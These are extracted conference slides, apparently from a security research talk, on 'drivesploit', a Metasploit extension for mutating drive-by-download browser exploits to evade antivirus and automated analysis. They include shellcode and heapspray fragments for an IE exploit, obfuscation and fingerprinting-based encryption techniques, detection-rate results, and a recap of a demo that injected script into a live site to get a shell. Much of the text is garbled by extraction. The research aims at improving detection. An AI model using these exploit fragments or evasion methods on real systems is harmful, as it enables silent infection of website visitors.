drivesploit: circumventing both automated and manual drive-by-download detection

掛馬免殺掛馬免殺DRIVESPLOITDRIVESPLOITCIRCUMVENTINGAUTOMATED ANDAUTOMATED ANDMANUAL DETECTIONOF BROWSER EXPLOITSOF BROWSER EXPLOITS

Wayne Huang, Cofounder & CTOFyodor YarochkinAntonio Rohman FernandezAntonio Rohman FernandezChris HsiaoArmorize Technologies, Inc.@waynehuang

@ [email protected]

One type of browser exploit:One type of browser exploit:

Drive-by Downloads defined

2

Drive-by-Download Explained

• Hackers distribute malware by Hackers distribute malware by "poisoning" legitimate websites

• Typical: injects malicious iframesTypical: injects malicious iframesinto HTML content

3

Drive-by-Download Explained

• Affected websites:– Essentially becomes a delivery mechanism for

malware– Appear normal

• Victims– Do not need to "click" or "agree to" anything– Simply connecting to the website executes the

attack

4

Drive-by Download Incidents

• Aurora (Google)Aurora (Google)– June 2009-Feb 2010T t d tt k–Targeted attack

– IE 0day CVE-2010-0249–Confirmed publicly by Google, Adobe Systems, Juniper Networks

d R kSand RackSpace–Total of 34 organization targetedg g

Drive-by Download Incidents

• DNF666 Mass SQL InjectionDNF666 Mass SQL Injection–Since March, 2010J Ad b 0d CVE 2010 1297– Jun: Adobe 0day CVE-2010-1297

–Victims: Wall Street Journal, J l P t tJarusalem Post, etc

–dnf666.net, robint.us, 2677.in, 4589 i 22d f4589.in, 22dnf.com

GameSpot

US Treasury

http://thompson.blog.avg.com/2010/05/treasury‐website‐hacked.html

PlayStation.com

Washington Post

Dissecting Drive-By Downloads

Page + Browser

Exploit ServerPage + Browser

ExploitPayload =

d l ddownloader

12


Page + Browser


ExploitPayload =

d l d<script>var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2

downloader

%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8

var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } varcc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <

13

200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = " \


Page + BrowserExploit!


ExploitPayload =


downloader



14



Exploit!Exploits / droppers

Exploit ServerDropper executesExploits / droppers

15


Exploits / droppersExploits / droppers

Exploit ServerMalware

Malware Server

16




Malware Server

17Controller


But who would visit?But who would visit?The key now is TRAFFIC



Malware Server

18Controller

(1) Legitimate, injectable sites

URL Generators Landing Site

Exploits / droppers

Landing Site

Exploits / droppers


Malware Server

19Controller

(1) Legitimate, injectable sites


Exploits / droppers

Landing Site

May-Ongoing: DNF666 mass SQL Exploits / droppers

Exploit Serveray O go g 666 ass SQ

injections

Malware May-June: Shared hosting compromise, GoDaddy RackSpace Network

Malware ServerGoDaddy, RackSpace, Network Solutions, BlueHost, DreamHost

20 Continuous targeted attacks

(1) Legitimate, vulnerable sites


Exploits / droppers

Landing Site

Mass SQL injectionsExploits / droppers

Exploit Server Mass hosting compromises

Malware Directly inside HTML / PHP / ASP

Hidden inside WorldPress files

Malware Server Hidden inside DB

21 Hidden inside DB stored procedures

(2) Man-in-the-MiddleLANWAN


Exploits / droppers

Landing Site

No tampering of websiteExploits / droppers

Exploit Server

p g

LAN: ARP spoofing via ZXARPS and other

Malwaretools

WAN: March 2009 middle of route Malware Server

WAN: March 2009, middle of route, tw.msn.com, taiwan.cnet.com, others

22

Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778

LIVE LIVE DEMO 1DEMO 1LIVE LIVE DEMO 1DEMO 1

http://digg.com/software/http://digg.com/software/http://digg.com/software/http://digg.com/software/Internet_Storm_CenterInternet_Storm_Center__

23

_ __ _ __Diary_2010_02_27Diary_2010_02_27

Live demo recap

Live demo recap

Injected javascript in digg.com

Live demo recap

1. Inject javascript into digg.comj j p gg2. Javascript loads iframe from our domain

zcrack.orgzcrack.org3. Metasploit (drivesploit) is running on

zcrack org serves ie peers exploitzcrack.org, serves ie peers exploit4. Bypasses AV5. IE visitor attacked, IE crashes,

meterpreter starts, jumps process to notepad exenotepad.exe

6. We have a shell :)

MOTIVATIONMOTIVATION

We provide solutions that monitors pwebsites and detect malicious

t t 24 7contents 24x7

We use multiple behavior-, heuristic-, p , ,and signature-based technologies

27

MOTIVATION

Most technologies are developed on Most technologies are developed on our own, BUT,

We also integrate anti-virus, whose

$expensive$licenses are $expensive$28

MOTIVATION

We spend a lot of time testing our own We spend a lot of time testing our own technologies, and selecting anti-virus

t h l gitechnologies

The key is: how good are we (and them) at

NEWdetecting NEW drive-by downloads

29

MOTIVATIONMOTIVATION

We need a good framework to help us g preplicate, manipulate, and mutate

exploits found in the wildexploits found in the wild

--into NEW derivatives

30

DRIVESPLOITDRIVESPLOITIS BORNIS BORN

ON TOP OF ON TOP OF METASPLOITMETASPLOIT

31

INITIAL FINDINGS

ANTIVIRUS CAPABILITIESDIFFER GREATLY!DIFFER GREATLY!

DESKTOP AND API VERSIONSDIFFER GREATLY IN PERFORMANCE

COST != PERFORMANCE

Antivirus vs. Drive-bys


Exploits / droppers

Landing Site

Exploits / droppers


Malware Server

33Controller


URL Generators Landing SiteJAVASCRIPT

Exploits / droppers

Landing SiteJAVASCRIPT

Exploits / droppers

Exploit ServerJAVASCRIPTMalware

PE BINARYMalware Server

PE BINARY

34Controller


URL Generators Landing SiteJAVASCRIPT

Exploits / droppers

Landing SiteJAVASCRIPT

Exploits / droppers

Exploit ServerJAVASCRIPTMalware

PE BINARYMalware Server

PE BINARY

We will detect35Controller

We will detect this part!!

Why we can’t rely on PE detection

• Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on– Attack reported to the hosting / registrar

– Domain banned by ISPs

Purchased duration was over– Purchased duration was over

• We want to detect the injection so our customers We want to detect the injection so our customers can remove it

• Actually statically detecting javascript exploits is • Actually, statically detecting javascript exploits is quite difficult

36

THE TAO:THE TAO:ECMA SCRIPTSECMA-SCRIPTS

JAVASCRIPTJAVASCRIPTVBSCRIPTVBSCRIPTADOBE JS

ACTIONSCRIPT37

JAVASCRIPT!! (ECMA-SCRIPT)


Exploits / droppers

Landing Site

Exploits / droppers


Malware Server

38Controller



Exploits / droppers

Landing Site

Exploits / droppers


39Controller



Exploits / droppers

Landing Site

Exploits / droppers

Exploit Server

40Controller



Exploits / droppers

Landing Site

Exploits / droppers

Exploit Server(METASPLOT)(METASPLOT)

41Controller



Exploits / droppers

Landing Site

Exploits / droppers

Exploit Server(METASPLOT)

PAYLOAD(METASPLOT)meterpreter

(memory(memoryinjection)

42Controller

Drive-By wants to…

• Avoid detection at the victim's desktop

• Avoid detection by UTM/gatewaysAvoid detection by UTM/gateways• Avoid detection

b t t dby automatedmonitors

• Live for as long iblas possible

Drive-By wants to…

CONCLUSION: CONCLUSION: Reduce exposure:Serve SELECTIVELY

Avoid detection and analysis:Avoid detection and analysis:Mutate well

Serve Selectively

HTTP LEVEL:Serve only to:• Fresh IPs (serve once per IP)• Fresh IPs (serve once per IP)

set HTTP::client::onlyonce true

• Particular referer (eg Gumblar)• Particular referer (eg. Gumblar)set HTTP::referer google.com

• Particular agent string (vulnerable browser)Particular agent string (vulnerable browser)set HTTP::agent::MSIE 7.0

• Black listBlack listset HTTP::client::blacklist false

SCRIPT MUTATIONSCRIPT MUTATION

For exploitFor exploitF l dFor payload

46

The goal is not to "obfuscate"...

JAVASCRIPT EXPLOIT DISEC

ShellcodeShellcode

M Corrupt

Heapspray

Triggergg


Shellcode <script>var shellraw = Shellcode "%u7679%u4673%u757b%u924e%u66b9%ub441%u018d%u7df9%u241c%ud631%u40b7%ueb11%u043d%u

M Corrupt be97%u212c%u05e1%u8335%u42fc%ub893%u227f%u98d4%u484b%u8c90%u13e0%uf8d3%u7aba%u7278

Heapspray%u2034%u49f5%u259f%u9137%u339b%u1dd5%ub1b0%u3f99%u2f43%u3cb6%ub2a8%ub30c%u4714%u3d7b% 138% f803% 66b2% 97b9d7b%ue138%uf803%u66b2%u97b9%u9335%u767a%ub805%ue201%u4a2f%u85a8%u7eeb%uf93b%u414f%u257d%u78bf%u2c43%u7f99%ubb2Trigger u257d%u78bf%u2c43%u7f99%ubb2d%ub098%ub342%u918d%u3fb2%u704a%u7147%u7f74%u3073%u77f9%ubb40

gg

%ubb40


Shellcode var counter;var shellcode = Shellcode unescape(shellraw);var memory = new Array();var

Buffer Ovf slackspace = 0x86000‐(shellcode.length*2);var nops =

Heapsprayunescape("%u0c0c%u0c0c");

while(nops.length<slackspace/2) { } fillbl knops+=nops; }var fillblock =

nops.substring(0,slackspace/2);delete nops;Triggerfor(counter=0; counter<270; counter++) {memory[counter] = fillblock + fillblock + shellcode;

gg

fillblock + fillblock + shellcode;


Shellcode <button id='j id'Shellcode <button id j_id onclick='bootstrapper();' style='display:none'></butt

M Corrupt on>

………

Heapspray…

document.getElementById(Trigger'j_id').onclick();

gg


ShellcodeShellcodeOBFUSCATED

M Corrupt BLOB

Heapspray

TriggerDE‐

OBFUSCATORgg OBFUSCATORPrimitiveF

ObfuscatedFForm Form


Page + BrowserExploit!


ExploitPayload =


downloader



54




M Corrupt BLOB

Heapspray

TriggerDE‐

OBFUSCATORStart gg OBFUSCATORPrimitiveF




M Corrupt BLOB Mutate

HeapsprayMutate

TriggerDE‐





M Corrupt BLOB Mutate

HeapsprayMutate

TriggerDE‐


ObfuscatedFPreventForm FormPrevent

MUTATION FEATURESIMPLEMENTEDSO FARSO FAR

1. Javascript Random Variable Auto ReplacementReplacement• Accepts a piece of javascriptp p j p• Parses the javascript according to

grammergrammer• Auto replaces all variable names and

function names with random namesfunction names with random names• Passes back:

a) the new javascriptb) a vector of old-new name mappings) pp g

1. Javascript Random Variable Auto Replacementrandomized =

Replacement

Rex::Exploitation::DriveSploit::obfuscatejs(js, j (j ,Rex::Exploitation::DriveSploit::AUTO_RANDOM_VARS)

2. Javascript Concat String Obf tiObfuscation

arr = Rex::Exploitation::DriveSploit.obfuscat j ( h ll dtejs(shellcode, Rex::Exploitation::DriveSploit::STRINGCONCAT)CONCAT)

h ll d i t [0]shellcode script = arr[0]shellcode_var = arr[1]

2. Javascript Concat String Obf ti

% 7679% 4673% 757% 924

Obfuscation

%u7679%u4673%u757%u924e

A1 = "%u7";A2 = "679%";

A3 = "u4673%";A4 = "u75";A2 = 679% ;

A3 = "u4673%";A4 = "u75";

A4 = u75 ;A1 = "%u7";A5 = "7%u92";A4 = u75 ;

A5 = "7%u92";A6 "4e";

A5 = 7%u92 ;A2 = "679%";A6 "4e";A6 = "4e"; A6 = "4e";


% 7679% 4673% 757% 924

Obfuscation

%u7679%u4673%u757%u924e

A3 = "u4673%";A4 = "u75";

B1 = A1+A2;B2 = A3+A4; Layer 2

A4 = u75 ;A1 = "%u7";A5 = "7%u92";;

B3 = A5+A6;ay A5 = 7%u92 ;

A2 = "679%";A6 "4e";A6 = "4e";


% 7679% 4673% 757% 924

Obfuscation

%u7679%u4673%u757%u924e

B1 = A1+A2;B2 = A3+A4;

B2 = A1+A2;B3 = A5+A6;;

B3 = A5+A6;;

B1 = A3+A4;


% 7679% 4673% 757% 924

Obfuscation

A3 " 4673%” A4 " 75”

%u7679%u4673%u757%u924e

A3 = "u4673%”;A4 = "u75”;A1 = "%u7";A5 = "7%u92”;A2 = "679%";A6 = "4e"; B2 = A1+A2;A6 = 4e ; B2 = A1+A2;B1 = A3+A4;B3 = A5+A6;C1=B1+B2;D1=C1+B3;// variable names are randomized// variable names are randomized

3. Javascript Random Text Insertion

insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)

shellcode = insertret[0]random insertion string = insertret[1]

3. Javascript Random Text Insertion

insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10) # insert a fixed 6-character random# string, for every 4-8 characters

returnsa) a piece of javascript containing the

injected stringb) Javascript variable name containing

the reverted, original string

4. Numeric Literal Mutation

slackspace = pRex::Exploitation::Drivesploit obfuscateNumber(0x86000oit.obfuscateNumber(0x86000)

4. Numeric Literal Mutation

slackspace = pRex::Exploitation::Drivesploit obfuscateNumber(0x86000oit.obfuscateNumber(0x86000)

(246*2)+(5676*96)+(34*4)+8+(3332*1)( 6 ) (56 6 96) (3 ) 8 (333 )

4. Numeric Literal Mutationslackspace = 0x86000l kslackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1)

Trigger Prevention


M Corrupt BLOB

Heapspray

TriggerDE‐


ObfuscatedFPreventForm FormPrevent

Trigger prevention

• <div onload• <img onload• var a=1; var b=0;• var a=1; var b=0;

do {useless code;

} while (a==b);} while (a b);• Fingerprinting-based encryption

TESTING IT OUTUsing the IE peers exploit as exampleCVE‐2010‐0806(MS10‐018)

PLAIN: 17/42

RANDOM VARS: 16/42 (某採!)

INJECT SC: 13/42

RANDVAR+CONCAT SC+INJECT SC 11/4211/42

ROUGHLY 6/17ANTI VIRUSANTI-VIRUSDETECTS BASED ONDETECTS BASED ONSHELLCODE(FOR THIS EXPLOIT)(FOR THIS EXPLOIT)

CONCAT SC+CODE: 1/42

INJECT SC+CONCAT CODE: 0/42

RANDVAR+INJECT SC+CONCAT CODE: 0/42CODE: 0/42

ANTIVIRUSDESKTOP VERSIONIS MUCH STRONGERIS MUCH STRONGER

ANTIVIRUS DESKTOP VERSION

• Can monitor host environmentCan monitor host environment– Hook into browsers– Easier to get raw form of– Easier to get raw form of

exploit

• Behavior analysisBehavior analysis– Buffer overflow behavior

Download to file behavior– Download-to-file behavior

AntiVirus Desktop Kung FuTo Ag Sc Aa Ky

Plain ✖ ✖ ✔ ✔ ✔

Random variables ✖ ✖ ✔ ✔ ✔

Split literals ✖ ✖ ✔ ✔ ✔

Injection SC ✖ ✖ ✔ ✔ ✔Injection SC ✖ ✖ ✔ ✔ ✔

Concat SC ✖ ✖ ✔ ✔ ✔

Concat CODE ✖ ✔ ✖ ✔ ✔

Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔

Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔

AntiVirus Desktop Kung FuTo Ag Sc Aa Ky M

Plain ✖ ✖ ✔ ✔ ✔ ✔✔

Random variables ✖ ✖ ✔ ✔ ✔ ✔✔

Split literals ✖ ✖ ✔ ✔ ✔ ✔✔

Injection SC ✖ ✖ ✔ ✔ ✔ ✖✔Injection SC ✖ ✖ ✔ ✔ ✔ ✖✔

Concat SC ✖ ✖ ✔ ✔ ✔ ✖✔

Concat CODE ✖ ✔ ✖ ✔ ✔ ✖✔

Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ ✖✔

Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔ ✖✔

LIVE DEMO 2LIVE DEMO 2DESKTOPANTIVIRUSBYPASSBYPASS

5. FINGERPRINTING-BASED ENCRYPTION

Wepawet doesn’t tell much

88

Browser Feature TableIE7 FF Safari Opera Chrome

Is contextmenu event supported True True True False TrueIs_contextmenu_event_supported True True True False True

String_prototype_replace_ignore_functions False False True (2.0.2) False False

Is_ES5_strict_mode_supported False False False False False

Array prototype slice can convert to array False True True True TrueArray_prototype_slice_can_convert_to_array False True True True True

Getelementsbytagname_returns_comment_nodes True False False False False

Is_element_tagname_uppercased True True True True True

Is_canvas_element_supported False True True True True

Is_DOMFocusIn_supported False False True True True

Is_CSS_boder_radius_supported False True True False True

Function_identified_leaks_onto_enclosing_scope True False False False False

Script_element_rejects_textnode_appending True False False False False

Is_contextmenu_event_supported True True True False True

Is_position_fixed_supported False True True False True

Computed_style_return_static_positioned_element False False False True False

93

5. Fingerprinting-Based Encryption Summary• "This exploit works only for IE6"• This exploit works only for IE6• "Give me an encrypted version of my

j i t l it”javascript exploit”• "Give me javascript to generate the

decoding key"• "The key is only correctly generated if the y y y g

javascript is run under IE6"

94

5. Fingerprinting-Based Encryption Summary

A=Check1();

B=Check3();B=Check3();

C=Check4();

D=Check6();D Check6();

E=Check8();

F=Check9();();

G=Check12();

H=Check14();

95


A=Check1();

B=Check3();

A=Check6();

B=Check12();B=Check3();

C=Check4();

D=Check6();

B=Check12();

C=Check8();


E=Check8();

F=Check9();

D Check1();

E=Check4();

F=Check14();();

G=Check12();

H=Check14();

();

G=Check3();

H=Check9();

96


A=Check1();

B=Check3();

A=Check6();

B=Check12();One‐time key

B=Check3();

C=Check4();

D=Check6();

B=Check12();

C=Check8();


E=Check8();

F=Check9();

D Check1();

E=Check4();

F=Check14();

Encryptjavascript

l();

G=Check12();

H=Check14();

();

G=Check3();

H=Check9();

exploit

Generatedecoding

97

decodingjavascript

Why not Anti-Virus?

• AV is to install on desktops / notebooksp• Complicated normal behaviors• Strict resource constraints• Strict resource constraints• Therefore, AV and gateway vendors rely

on:– Signature-based pattern matching technologies

LIGHTWEIGHT and ACCURATE– LIGHTWEIGHT and ACCURATE

• Why can’t such technology used to detect drive-by-downloads?drive-by-downloads?

98

Javascripts are not harmfult th i tto the environment…

99

… so they are usually not reused

AV no good because drive-by-downloads are in:g y• Disposable Javascript• Disposable PDF Adobe JS• Disposable PDF Adobe JS• Disposable Flash actionscript• All ECMA-

scriptsscripts

100you don't usually reuse them…

Javascript Packing Is a NormJavascript Packing Is a Norm• Packing is widely used by legitimate code!

– To protect javascript source codeTo protect javascript source code– To reduce javascript size

• Google Closure Compilerhttp //code google com/clos e/compile /– http://code.google.com/closure/compiler/

• Yahoo Javascript Packer (YUI Compressor)– http://developer.yahoo.com/yui/compressor/ p // p y /y / p /

• Advanced HTML Protector– http://www.creabit.com/htmlprotect/D Ed d ’ P k• Dean Edwards’ Packer– http://dean.edwards.name/packer/

• Online JS ObfuscatorOnline JS Obfuscator– http://www.iwebtool.com/html_encrypter

• http://www.cha88.cn/safe/fromCharCode.php

101

OK so AV doesn’t work (that well)… OK so AV doesn t work (that well)…How about behavior-based approaches?

102

Defeating Behavior Analysis

1. Use VBScript– Exploits in VBScript– URL generators in VBScript

Exploits in / generated by VBScript– Exploits in / generated by VBScript– May defeat SpiderMonkey et al (Rhino,

JSunPack, etc)

2. Don’t serve to detectors– You can’t detect what you don’t have– Serve to each IP only once

Detect agent strings– Detect agent strings– Collect robot IPs—Google, Yahoo, security

vendors

103

Defeating Behavior Analysis

3. Fingerprint-based encryptiong p yp

l b ff h3. Little but effective techniques– Sleep(30000); //using SetTimeout– Timelock puzzles

104

Future Work

• Randomly chop up scripts and split into d d l f lindividual files

• Generating VBscript instead of javascriptg p j p• Encrypting

using datausing dataexistingoutside ofHTML– HTTP headers

Discussion

• The Panopticlick experiment by p p yEckersley of EFF– 94.2% of "typical desktop browsers” are uniqueyp p q

• Can fingerprinting-based encryption be integrated with this type of be integrated with this type of individual fingerprinting, to prevent detection and analysis of target detection and analysis of target attacks?

THANK YOU!THANK [email protected]

@waynehuang

@drivesploit

http://www drivesploit orghttp://www.drivesploit.org

Credits: wayne huang, fyodor yarochkin, g

antonio rohman fernandez

Special thanks to: Benson Wu, Jeremy Chiu,

Kuon Ding Felix ColaKuon Ding, Felix, Cola

References• James Lee, Using guided missles in drive-bys

http://www slideshare net/egypt/using-guided-missiles-in-http://www.slideshare.net/egypt/using guided missiles indrivebys-automatic-browser-fingerprinting-and-exploitation-with-the-metasploit-frameworks-browser-autopwn

• Sebastian Porst, How to really obfuscate your , y yPDF malware http://www.slideshare.net/cblichmann/how-to-really-obfuscate-your-pdf-malware

• Jeremy Chiu, 0box analyzer: afterdarkJeremy Chiu, 0box analyzer: afterdarkruntime forensics for automated malware analysis and clustering http://www.slideshare.net/wayne_armorize/0-box-analyzer-ft d k ti f i f t t d l l i dafterdark-runtime-forensics-for-automated-malware-analysis-and-

clustering-2

• HeapLib support added to Metasploit 3 http://blog metasploit com/2007/04/heaplib support added tohttp://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html

drivesploit: circumventing both automated and manual drive-by-download detection

Technology